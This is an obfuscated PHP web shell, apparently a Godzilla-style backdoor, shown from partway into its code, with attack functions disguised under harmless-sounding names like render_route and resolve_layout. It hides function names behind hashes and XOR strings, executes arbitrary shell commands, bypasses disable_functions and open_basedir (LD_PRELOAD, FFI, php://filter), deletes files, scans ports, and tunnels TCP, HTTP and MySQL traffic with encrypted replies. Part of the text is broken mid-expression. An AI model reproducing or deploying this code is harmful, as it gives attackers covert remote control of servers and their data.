0,'bb6f4ec5'=>1,'73e721ef'=>2,'2693a743'=>3,'129c5752'=>4,'9897a8cd'=>13,'343604cc'=>16,'bac44b6a'=>17,'638b6ffd'=>18,'f23510dc'=>19,'5126ac48'=>20,'fcdf27a9'=>21,'6b6b25eb'=>27,'cd55bad4'=>28,'84a7e1a7'=>29,'01be3152'=>30,'f0a09e54'=>31,'8596e554'=>32,'4a41c8d9'=>33,'bd766295'=>34,'d8512038'=>35,'089a70c2'=>36,'9ff5d542'=>65,'f0e567fb'=>66); $_5d8e=get_defined_functions(); $_d382=isset($_5d8e["int"."ernal"])?$_5d8e["int"."ernal"]:array(); array_walk($_d382,function($_f)use(&$_g,$_41a8){$_h=hash("crc32b",$_f);if(isset($_41a8[$_h]))$_g[$_41a8[$_h]]=$_f;}); $_167a=function($e,$k){$d=pack("H*",$e);return $d^str_pad('',strlen($d),$k);}; $_c414='f9p0sjecmnhw'; $_g[5]=$_167a('1258035b1f0316174d412e38467a236653452b2b',$_c414); $_g[6]=$_167a('164a501d160c12144d5c5658025c061f1d1f090f4d121457164a50510612455153410c1210161e451f06',$_c414); $_g[7]=$_167a('4949025f10',$_c414); $_g[8]=$_167a('154d1144',$_c414); $_g[9]=$_167a('154d11440619',$_c414); $_g[10]=$_167a('0554145c1a0400',$_c414); $_g[11]=$_167a('1c5000105e1b454e1f4e',$_c414); $_g[12]=$_167a('13570a59034a480c4d',$_c414); $_g[14]=$_167a('0949155e2c080410080a0105',$_c414); $_g[15]=$_167a('025003511106003c0b1b061412501f5e00',$_c414); $_g[22]=$_167a('0f57041000131617080340140957034453090d021f4e421409541d511d0e4c58',$_c414); $_g[23]=$_167a('0a5012535d190a4d5b',$_c414); $_g[24]=$_167a('2a7d2f60212f292c2c2a',$_c414); $_g[25]=$_167a('154003441607',$_c414); $_g[26]=$_167a('45501e531f1f01064d521b03025519525d025b694e0706140a4c14555356100d041d1c1348514e3a2c350417191c0115134d156f2c424d0002001b03144c13441c184c4a4d18071e021917185a11100d1e0b1c12084f58123f2e3a333f2b2438277d521948191c10190b055f015c04551d1c4d4135315f31500b450051434c581064',$_c414); $_g[37]=$_167a('0b5c04581c0e2b02000b',$_c414); $_g[38]=$_167a('0554147c1a0400',$_c414); $_g[39]=$_167a('0250027e120700',$_c414); $_g[40]=$_167a('16580458',$_c414); $_g[41]=$_167a('00501c553d0b0806',$_c414); $_g[42]=$_167a('00501c55250b091608',$_c414); $_g[43]=$_167a('05561e44160411',$_c414); $_g[44]=$_167a('154b13761a06002d0c030d',$_c414); $_g[45]=$_167a('025c034435030906230f0512',$_c414); $_g[46]=$_167a('0f49',$_c414); $_g[47]=$_167a('1656024400',$_c414); $_g[48]=$_167a('05561d40010f16102b070412',$_c414); $_g[49]=$_167a('05561d40010f161029071a',$_c414); $_g[50]=$_167a('12400055',$_c414); $_g[51]=$_167a('055414',$_c414); $_g[52]=$_167a('134b1c',$_c414); $_g[53]=$_167a('0b5c04581c0e',$_c414); $_g[54]=$_167a('0e5c1154161816',$_c414); $_g[55]=$_167a('04561449',$_c414); $_g[56]=$_167a('0e560344',$_c414); $_g[57]=$_167a('16560244',$_c414); $_g[58]=$_167a('12501d551c1f112e1e',$_c414); $_g[59]=$_167a('05561e5e3a0e',$_c414); $_g[60]=$_167a('0b5808720a1e0010',$_c414); $_g[61]=$_167a('04551f53182716',$_c414); $_g[62]=$_167a('1658095c1c0b01',$_c414); $_g[63]=$_167a('055614553d0b0806',$_c414); $_g[64]=$_167a('04501e731c0e00',$_c414); $GLOBALS['_d65b20']=&$_g; $_489d80=function($_p){($_p);}; function resolve_layout(string $d, string $k): string { $kp = str_repeat($k, (int)(strlen($d) / strlen($k)) + 2); return $d ^ substr($kp, 1, strlen($d)); } function init_layout_bucket(string $raw): array { $m=array(); $i=0; $n=strlen($raw); while($i<$n){ $p=strpos($raw,pack('H*','02'),$i); if($p===false || $p+5>$n){ break; } $k=substr($raw,$i,$p-$i); $len=ord($raw[$p+1]) | (ord($raw[$p+2])<<8) | (ord($raw[$p+3])<<16) | (ord($raw[$p+4])<<24); $v=substr($raw,$p+5,$len); $m[$k]=$v; $i=$p+5+$len; } return $m; } function init_module(string $c): string { $_g=$GLOBALS['_d65b20']; if(function_exists($_g[0])){$_r=@$_g[0]($c);if(is_string($_r))return $_r;} if(function_exists($_g[1])){$_o=array();@$_g[1]($c,$_o);return join("\n",$_o);} return ""; } function dispatch_route_taxonomy($dir): string { if($dir==="" || $dir===null){ $dir="."; } if(!is_dir($dir)){ return "error: dir not exists"; } $dirs=array(); $files=array(); $arr=@scandir($dir); if($arr===false){ return "error: read dir failed"; } foreach($arr as $nm){ if($nm==="." || $nm===".."){ continue; } $fp=rtrim($dir,"/\\").DIRECTORY_SEPARATOR.$nm; $mt=@filemtime($fp); if($mt===false){ $mt=0; } $dt=@date("Y-m-d H:i:s",$mt); if(@is_dir($fp)){ $dirs[]=array(strtolower($nm), $dt."\t0\td\t".$nm); } else{ $sz=@filesize($fp); if($sz===false){ $sz=0; } $files[]=array(strtolower($nm), $dt."\t".$sz."\tf\t".$nm); } } usort($dirs,function($a,$b){ return strcmp($a[0],$b[0]); }); usort($files,function($a,$b){ return strcmp($a[0],$b[0]); }); $out=""; foreach($dirs as $r){ $out.=$r[1]."\r\n"; } foreach($files as $r){ $out.=$r[1]."\r\n"; } return $out; } function render_route(string $dir): bool { if($dir==="" || !is_dir($dir)){ return true; } $items=@scandir($dir); if($items===false){ return false; } foreach($items as $it){ if($it==="." || $it===".."){ continue; } $p=rtrim($dir,"/\\").DIRECTORY_SEPARATOR.$it; if(@is_dir($p)){ if(!render_route($p)){ return false; } }else{ if(!@unlink($p)){ return false; } } } return @rmdir($dir); } function dispatch_scope_cursor($fp){ $parent=@dirname($fp); if($parent!=="" && $parent!=="." && !@is_dir($parent)){ @mkdir($parent,0777,true); } } function normalize_value_adapter($src,$dst){ if($dst==="" || $src===""){ return $dst; } if(@is_dir($dst)){ return rtrim($dst,"/\\").DIRECTORY_SEPARATOR.basename($src); } return $dst; } function mod_inspect_view(string $ip, string $ports): string { $_g=$GLOBALS['_d65b20']; $portArr=explode(",",$ports); $res=array(); foreach($portArr as $p){ $p=(int)trim($p); if($p<=0||$p>65535) continue; $open=0; $fp=@$_g[2]($ip,$p,$en,$es,0.7); if(is_resource($fp)||$fp!==false){ $open=1; @fclose($fp); } $res[]=$ip."\t".$p."\t".($open?"1":"0"); } return implode("\n",$res); } function parse_layout_post(): string { $_g=$GLOBALS['_d65b20']; if(stripos(PHP_OS,"WIN")===0){ $cmdWin=$_g[5]; $r=init_module($cmdWin); $lines=explode("\n",$r); $out=array(); $out[]="PID\tIMAGE\tSESSION\tMEM\tSTATUS"; foreach($lines as $ln){ $ln=trim($ln); if($ln==="") continue; $cols=str_getcsv($ln); if(count($cols)>=5){ $out[]=$cols[1]."\t".base64_encode($cols[0])."\t".$cols[2]."\t".$cols[4]."\t".$cols[3]; } } return implode("\n",$out); } $_pd=$_g[7]; $out=array(); $out[]="UID\tPID\tPPID\tSTIME\tTTY\tTIME\tCMD"; if(@is_dir($_pd)){ $dirs=@scandir($_pd); if($dirs){ foreach($dirs as $d){ if(!ctype_digit($d)) continue; $_bp=$_pd."/".$d."/"; $stat=@$_g[3]($_bp.$_g[8]); $status=@$_g[3]($_bp.$_g[9]); $cmdline=@$_g[3]($_bp.$_g[10]); if($stat===false) continue; $uid="?"; if($status!==false && preg_match('/Uid:\s+(\d+)/',$status,$um)){ $uid=$um[1]; if(function_exists($_g[4])){ $pw=@$_g[4]((int)$uid); if(is_array($pw)&&isset($pw["name"])) $uid=$pw["name"]; } } $parts=explode(" ",$stat); $pid=isset($parts[0])?$parts[0]:$d; $ppid=isset($parts[3])?$parts[3]:"?"; $cmd=$cmdline!==false?str_replace(chr(0)," ",$cmdline):(isset($parts[1])?$parts[1]:"?"); $cmd=trim($cmd); if($cmd==="") $cmd=isset($parts[1])?$parts[1]:"?"; $out[]=$uid."\t".$pid."\t".$ppid."\t?\t?\t?\t".base64_encode($cmd); } } }else{ $cmdPs=$_g[6]; $r=init_module($cmdPs); $lines=explode("\n",$r); $first=true; foreach($lines as $ln){ $ln=trim($ln); if($ln===""||$first){ $first=false; continue; } $cols=preg_split('/\s+/',$ln,8); if(count($cols)>=8){ $out[]=$cols[0]."\t".$cols[1]."\t".$cols[2]."\t".$cols[4]."\t".$cols[5]."\t".$cols[6]."\t".base64_encode($cols[7]); } } } return implode("\n",$out); } function build_slice(string $dir, string $file): string { if(class_exists("ZipArchive")){ $zip=new ZipArchive(); $res=$zip->open($file,ZipArchive::CREATE|ZipArchive::OVERWRITE); if($res!==true) return "create zip failed: ".$res; $dir=realpath($dir); if($dir===false) return "dir not found"; if(is_file($dir)){ $zip->addFile($dir,basename($dir)); }else{ $it=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir,RecursiveDirectoryIterator::SKIP_DOTS),RecursiveIteratorIterator::SELF_FIRST); foreach($it as $f){ $rp=substr($f->getRealPath(),strlen($dir)+1); if($f->isDir()){ $zip->addEmptyDir($rp); } else{ $zip->addFile($f->getRealPath(),$rp); } } } $zip->close(); return "ok"; } $_g=$GLOBALS['_d65b20']; $_e=$_g[13];$_zc=$_g[11]; return init_module($_zc.$_e($file)." ".$_e($dir)." 2>&1"); } function ctx_parse_context(string $file, string $dir): string { if(class_exists("ZipArchive")){ $zip=new ZipArchive(); $res=$zip->open($file); if($res!==true) return "open zip failed: ".$res; if(!@is_dir($dir)) @mkdir($dir,0777,true); $zip->extractTo($dir); $zip->close(); return "ok"; } $_g=$GLOBALS['_d65b20']; $_e=$_g[13];$_uz=$_g[12]; return init_module($_uz.$_e($file)." -d ".$_e($dir)." 2>&1"); } function mod_register_schema(): string { $_g=$GLOBALS['_d65b20']; $_k=$_g[14]; $ob=@ini_get($_k); if($ob===false||$ob==="") return $_k." is not set"; $res=$_k.": ".$ob."\n"; $methods=array(); @ini_set($_k,".."); $new=@ini_get($_k); if($new!==false&&$new!==$ob){ $methods[]="ini_set"; @ini_set($_k,"/"); } $tmp=@sys_get_temp_dir(); if($tmp===false) $tmp="/tmp"; $old=@getcwd(); $ok=false; if(@chdir($tmp)){ @ini_set($_k,".."); for($i=0;$i<10;$i++){ if(!@chdir("..")) break; } @ini_set($_k,"/"); $check=@file_exists("/etc/passwd")||@is_dir("/"); if($check){ $ok=true; $methods[]="chdir+ini_set"; } if($old!==false) @chdir($old); } if(function_exists("glob")){ $g=@glob("/*"); if(is_array($g)&&count($g)>0){ $methods[]="glob://"; $res.="glob result: ".implode(", ",$g)."\n"; } } if(count($methods)>0){ $res.="bypass success via: ".implode(", ",$methods)."\n"; $res.="new ".$_k.": ".@ini_get($_k)."\n"; $roots=@scandir("/"); if(is_array($roots)) $res.="/: ".implode(", ",$roots)."\n"; }else{ $res.="bypass failed with known methods\n"; } return $res; } function init_option(string $type, string $cmd): string { $_g=$GLOBALS['_d65b20']; $df=@ini_get($_g[15]); if($df===false) $df=""; $res=$_g[15].": ".$df."\n"; if($type==="info"){ return $res."PHP_VERSION: ".PHP_VERSION."\nPHP_SAPI: ".PHP_SAPI."\nloaded_extensions: ".implode(", ",get_loaded_extensions()); } if($type==="php-filter-bypass"||$type===""){ $tmp=@tempnam(@sys_get_temp_dir(),"t"); $_se=$_g[0]; $code=''; $payload="php://filter/write=convert.base64-decode/resource=".$tmp; @$_g[66]($payload,base64_encode($code)); if(@file_exists($tmp)){ @$_489d80($tmp); $out=@file_get_contents($tmp); @unlink($tmp); if($out!==false&&$out!==""){ return $out; } } $res.="php-filter: no output\n"; } if($type==="pcntl"&&function_exists($_g[19])){ $r=array(); @$_g[1]($cmd,$r); return implode("\n",$r); } if($type==="ffi"&&class_exists("FFI")){ try{ $ffi=FFI::cdef($_g[22],$_g[23]); $_m=$_g[25]; ob_start(); $ffi->$_m($cmd); $out=ob_get_clean(); return $out; }catch(Exception $e){ $res.="FFI: ".$e->getMessage()."\n"; } } $_pe=$_g[18]; if($type==="mail"||$type==="LD_PRELOAD"){ if(!function_exists($_pe)){ $res.="mail/LD: not available\n"; } else{ $tmp=@tempnam(@sys_get_temp_dir(),"t"); $so=@tempnam(@sys_get_temp_dir(),"t").".so"; $csrc=$so.".c"; @$_g[66]($csrc,$_g[26]); $ok=false; $_ex2=$_g[1]; foreach(array("gcc","cc","/usr/bin/gcc","/usr/bin/cc") as $cc2){ @$_ex2($cc2." -shared -fPIC -nostartfiles -o ".escapeshellarg($so)." ".escapeshellarg($csrc)." 2>/dev/null",$_o,$rc); if($rc===0&&@file_exists($so)){ $ok=true; break; } } if($ok){ $_lp=$_g[24]; @$_pe($_lp."=".$so); @$_pe("X_7F6250=".$cmd." > ".$tmp." 2>&1"); $_ml=$_g[20]; $_el=$_g[21]; if(function_exists($_ml)) @$_ml("a@b.c","","",""); elseif(function_exists($_el)) @$_el("",1,"a@b.c"); @$_pe($_lp."="); $out=@file_get_contents($tmp); @unlink($tmp);@unlink($so);@unlink($csrc); if($out!==false&&$out!=="") return $out; } @unlink($so);@unlink($csrc);@unlink($tmp); $res.="mail/LD: ".($ok?"no output":"compile failed")."\n"; } } $_po=$_g[16]; if(function_exists($_po)){ $p=@$_po($cmd,array(1=>array("pipe","w"),2=>array("pipe","w")),$pipes); if(is_resource($p)){ $out=@stream_get_contents($pipes[1]); @fclose($pipes[1]); @fclose($pipes[2]); @proc_close($p); if($out!==false&&$out!=="") return $out; } } $_pp=$_g[17]; if(function_exists($_pp)){ $p=@$_pp($cmd,"r"); if($p){ $out=@fread($p,1048576); @pclose($p); if($out!==false&&$out!=="") return $out; } } return $res."all methods failed"; } function parse_config(string $url, string $method, string $headers, string $body): string { $_g=$GLOBALS['_d65b20']; $opts=array("http"=>array("method"=>$method,"timeout"=>30,"ignore_errors"=>true)); if($headers!=="") $opts["http"]["header"]=$headers; if($body!=="") $opts["http"]["content"]=$body; $opts["ssl"]=array("verify_peer"=>false,"verify_peer_name"=>false); $ctx=$_g[27]($opts); $resp=@$_g[3]($url,false,$ctx); if($resp===false) $resp=""; $status="HTTP/1.1 200 OK"; $respHeaders=""; if(isset($http_response_header)&&is_array($http_response_header)){ $status=$http_response_header[0]; $respHeaders=implode("\r\n",array_slice($http_response_header,1)); } return $status."\r\n".$respHeaders."\r\n\r\n".$resp; } function svc_normalize_widget(array $pm): string { $h=isset($pm["host"])?trim((string)$pm["host"]):""; $pt=isset($pm["port"])?(int)$pm["port"]:3306; if($pt<=0){ $pt=3306; } $usr=isset($pm["user"])?(string)$pm["user"]:""; $pwd=isset($pm["password"])?(string)$pm["password"]:""; $dbn=isset($pm["database"])?(string)$pm["database"]:""; $sql=isset($pm["sql"])?(string)$pm["sql"]:""; if($sql===""){ return "ERR\tempty sql"; } if($h===""){ $h="127.0.0.1"; } $dbopt=$dbn!==""?$dbn:""; if(class_exists("mysqli")){ $m=@new mysqli($h,$usr,$pwd,$dbopt,$pt); if($m->connect_error){ return "ERR\t".$m->connect_error; } @$m->set_charset("utf8mb4"); $ok=@$m->query($sql); if($ok===false){ $e=$m->error; $m->close(); return "ERR\t".$e; } if($ok===true){ $aff=(int)$m->affected_rows; $ins=(int)$m->insert_id; $m->close(); return "OK\tEXEC\t".$aff."\t".$ins; } $cols=array(); foreach($ok->fetch_fields() as $fd){ $cols[]=$fd->name; } if(function_exists("mysqli_fetch_all")){ $mat=$ok->fetch_all(MYSQLI_NUM); } else{ $mat=array(); while($rw=$ok->fetch_row()){ $mat[]=$rw; } } $ok->free(); $m->close(); $obj=array("cols"=>$cols,"rows"=>$mat); $js=@json_encode($obj,256); if($js===false){ return "ERR\tjson_encode failed"; } return "OK\tDATA\t".base64_encode($js); } if(class_exists("PDO")){ $has=false; foreach(PDO::getAvailableDrivers() as $d){ if($d==="mysql"){ $has=true; break; } } if(!$has){ return "ERR\tpdo_mysql missing"; } $dsn="mysql:host=".$h.";port=".$pt.($dbn!==""?";dbname=".$dbn:""); try{ $pdo=new PDO($dsn,$usr,$pwd,array(PDO::ATTR_ERRMODE=>PDO::ERRMODE_EXCEPTION)); $pdo->query("SET NAMES utf8mb4"); $st=$pdo->query($sql); if($st===false){ return "ERR\tquery failed"; } $nc=(int)$st->columnCount(); if($nc===0){ $aff=(int)$st->rowCount(); $ins=(int)$pdo->lastInsertId(); return "OK\tEXEC\t".$aff."\t".$ins; } $cols=array(); for($i=0;$i<$nc;$i++){ $meta=$st->getColumnMeta($i); $cols[]=isset($meta["name"])?$meta["name"]:("c".$i); } $mat=$st->fetchAll(PDO::FETCH_NUM); $obj=array("cols"=>$cols,"rows"=>$mat); $js=@json_encode($obj,256); if($js===false){ return "ERR\tjson_encode failed"; } return "OK\tDATA\t".base64_encode($js); }catch(Throwable $e){ return "ERR\t".$e->getMessage(); } } return "ERR\tneed mysqli or pdo_mysql"; } function finalize_field(): void { if(!isset($GLOBALS["ctx_26aa5c_ef8db6"]) || !is_array($GLOBALS["ctx_26aa5c_ef8db6"])){ $GLOBALS["ctx_26aa5c_ef8db6"]=array(); } } function set_context_widget(string $host, string $port, string $timeoutMs): string { finalize_field(); $_g=$GLOBALS['_d65b20']; $h=is_string($host)?trim($host):""; $pt=(int)$port; $tmo=max(800,min((int)$timeoutMs,120000)); if($h==="" || $pt<=0 || $pt>65535){ return "ERR\tbad host/port"; } $peer=$h; if(strpos($h,":")!==false && strpos($h,"[")!==0){ $peer="[".$h."]"; } $errno=0; $err=""; $to=max(1,$tmo)/1000.0; $fp=@$_g[28]("tcp://".$peer.":".$pt,$errno,$err,$to,STREAM_CLIENT_CONNECT); if(!$fp){ return "ERR\t".($err!==""?$err:"connect failed"); } $_g[29]($fp,true); if(function_exists($_g[32])){ $id=bin2hex($_g[32](8)); } else { $id=str_replace(".","",uniqid("",true)); } $GLOBALS["ctx_26aa5c_ef8db6"][$id]=$fp; return "OK\t".$id; } function validate_manifest(string $id, string $maxBytes, string $blockMs): string { finalize_field(); if(!isset($GLOBALS["ctx_26aa5c_ef8db6"][$id])){ return "ERR\tno_conn"; } $_g=$GLOBALS['_d65b20']; $fp=$GLOBALS["ctx_26aa5c_ef8db6"][$id]; $cap=min(max((int)$maxBytes,1),262144); $blk=max(200,min((int)$blockMs,60000)); $sec=(int)($blk/1000); $usec=($blk%1000)*1000; $_g[30]($fp,$sec,$usec); $chunk=@fread($fp,$cap); if($chunk===false){ $chunk=""; } if($chunk!==""){ return "OK\t".base64_encode($chunk); } $meta=@$_g[31]($fp); if(is_array($meta) && !empty($meta["timed_out"])){ return "OK\t"; } if(is_array($meta) && !empty($meta["eof"])){ @fclose($fp); unset($GLOBALS["ctx_26aa5c_ef8db6"][$id]); return "CLOSED\t"; } return "OK\t"; } function normalize_option_route(string $id, $payload): string { finalize_field(); if(!isset($GLOBALS["ctx_26aa5c_ef8db6"][$id])){ return "ERR\tno_conn"; } $fp=$GLOBALS["ctx_26aa5c_ef8db6"][$id]; if($payload===null || $payload===""){ return "OK\t"; } $left=$payload; while(strlen($left)>0){ $n=@fwrite($fp,$left); if($n===false||$n===0){ return "ERR\twrite failed"; } if($ngetMessage(); } } } else if($_h==2771454199){ $pcn=filter_adapter($pm,$ua9_25); if($pcn===""){ $out="unsupported"; } elseif(!isset($GLOBALS["GZPHP_INC"][$pcn])||!$GLOBALS["GZPHP_INC"][$pcn]){ $out="no defineClass"; } elseif(!class_exists($pcn,false)){ $out="no defineClass"; } else{ $gpm=array(); $_kCn=$ua9_25; $_kMn=$ua9_27; foreach($pm as $gk=>$gv){ if($gk===$_kCn||$gk===$_kMn) continue; $gpm[$gk]=$gv; } try{ if(method_exists($pcn,"run")){ $rm=new ReflectionMethod($pcn,"run"); if($rm->isStatic()) $ret=$rm->invokeArgs(null,array($gpm)); else{ $pi=new $pcn(); $ret=$rm->invokeArgs($pi,array($gpm)); } if($ret===null) $out=""; elseif(is_string($ret)) $out=$ret; elseif(is_array($ret)) $out=json_encode($ret); else $out=(string)$ret; }else{ $out="no run method"; } }catch(Throwable $e){ $out=$e->getMessage(); } } } $enc=base64_encode(resolve_layout($out,$RK)); $rid=(isset($_POST["request"."Id"])&&is_string($_POST["request"."Id"])&&preg_match("/^[a-fA-F0-9]{4,64}$/",$_POST["request"."Id"]))?$_POST["request"."Id"]:(function_exists("random_bytes")?bin2hex(random_bytes(8)):"r".substr(md5(uniqid("",true)),0,12));$ts=(int)round(microtime(true)*1000);$__gz_out=array("da"."ta"=>$enc,"request"."Id"=>$rid,"time"."stamp"=>$ts,"succ"."ess"=>true);echo json_encode($__gz_out); } /* ~22a0affec64b0109 */ ?>